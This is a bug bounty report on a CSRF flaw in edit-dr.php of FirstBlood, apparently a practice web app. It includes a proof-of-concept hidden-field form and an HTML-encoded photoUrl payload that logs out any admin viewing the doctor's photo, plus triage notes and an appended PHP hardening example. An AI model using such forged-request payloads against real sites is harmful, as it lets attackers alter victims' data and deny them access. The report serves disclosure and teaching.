FirstBlood-#1422 CSRF on edit-dr.php leads to admin DoS
This issue was discovered on FirstBlood v3

On 2022-12-10, agentmellow Level 3 reported:

As I returned to login.php, this led me to logout.php and its functionality.

First I realized the POST request at edit-dr.php with a custom photoUrl= can be made, as the parameter's CSRF token isn't validated; CSRF. Thus a logged-in user submitting the form will update the doctor accordingly (HTML encodings will be necessary!).

Simple POC:

  <script>history.pushState('', '', '/')</script>
  <form action="" method="POST">
    <input type="hidden" name="drid" value="4" />
    <input type="hidden" name="name" value="Sean" />
    <input type="hidden" name="bio" value="MyBioCSRF" />
    <input type="hidden" name="bookable" value="1" />
    <input type="hidden" name="photoUrl" value="&#47;test&#46;png" />
    <input type="submit" value="Submit request" />
  </form>

And while that is fun, it's even funnier to point the photoUrl to the GET logout.php via CSRF (HTML encodings will be necessary!). Edit the form script above to:

<input type="hidden" name="photoUrl" value="&#x2f;&#x2f;firstblood&#x2f;&#x2e;&#x2e;&#x2f;drpanel&#x2f;logout&#x2e;php">

Or for brevity: photoUrl=//firstblood/../drpanel/logout.php

- This can also be done as an authenticated user: simply use the POST request as an authenticated user and point logout.php at the image src of doctor 4 in my example:

DoS on any authenticated user logging in!:

POC with image-src loading logout.php:

One can also try to login with the default credentials, but will be logged out instantly.

P4 Low

This report contains multiple vulnerabilities:

  • Application/Business Logic
  • Cross Site Request Forgery

FirstBlood ID: 61
Vulnerability Type: Application/Business Logic

It mentions that doctor photos can NOT be modified but it is actually possible to modify them

FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery

There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and lack of token validation. It was intended that a POST request does not work due to no cookies sent on the request (because of SameSite), but due to an oversight this cookie was overwritten, rendering it useless.
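As an added example, not FirstBlood's own code, this is how an edit-dr.php style handler could be hardened against both findings above: a constant-time CSRF token check that does not rely on the SameSite cookie the triage note says was overwritten, and a photoUrl validator that rejects the //firstblood/../drpanel/logout.php value from the report. The function names and the /images/ prefix are assumptions.

```php
<?php
// Added example (not FirstBlood's own code): hardened handling for an
// edit-dr.php style endpoint. Function names and the /images/ prefix are
// assumptions. The browser decodes the report's &#x2f; entities before
// submitting, so validation runs on the decoded POST value.

// 1. Reject any state change whose token does not match the session's token.
//    The triage note says the SameSite cookie was overwritten, so the cookie
//    alone cannot be trusted; this check must not depend on it.
function csrf_token_is_valid(array $post, array $session): bool
{
    if (empty($post['csrf']) || empty($session['csrf'])) {
        return false;
    }
    return hash_equals($session['csrf'], $post['csrf']); // constant-time compare
}

// 2. Accept only a plain image path below /images/. The character class
//    excludes '/' and '.', so //host/..., ../ traversal and non-image targets
//    such as /drpanel/logout.php are all rejected.
function photo_url_is_valid(string $url): bool
{
    return preg_match('#^/images/[A-Za-z0-9_-]+\.(png|jpe?g|gif)$#', $url) === 1;
}

function handle_edit_dr(array $post, array $session): string
{
    if (!csrf_token_is_valid($post, $session)) {
        return '403 missing or invalid CSRF token';
    }
    if (!photo_url_is_valid($post['photoUrl'] ?? '')) {
        return '400 photoUrl must be an image path under /images/';
    }
    return '200 doctor ' . (int) $post['drid'] . ' updated';
}

// Constructed sample requests mirroring the report's payloads.
$session  = ['csrf' => bin2hex(random_bytes(16))];
$requests = [
    ['drid' => '4', 'photoUrl' => '/test.png'],                                          // no token
    ['drid' => '4', 'csrf' => $session['csrf'], 'photoUrl' => '//firstblood/../drpanel/logout.php'],
    ['drid' => '4', 'csrf' => $session['csrf'], 'photoUrl' => '/images/dr4.png'],
];
foreach ($requests as $post) {
    echo str_pad($post['photoUrl'], 40), ' -> ', handle_edit_dr($post, $session), PHP_EOL;
}
```

Run with `php example.php`: the first request is refused for the missing token, the second for the logout.php path, and only the third updates the doctor.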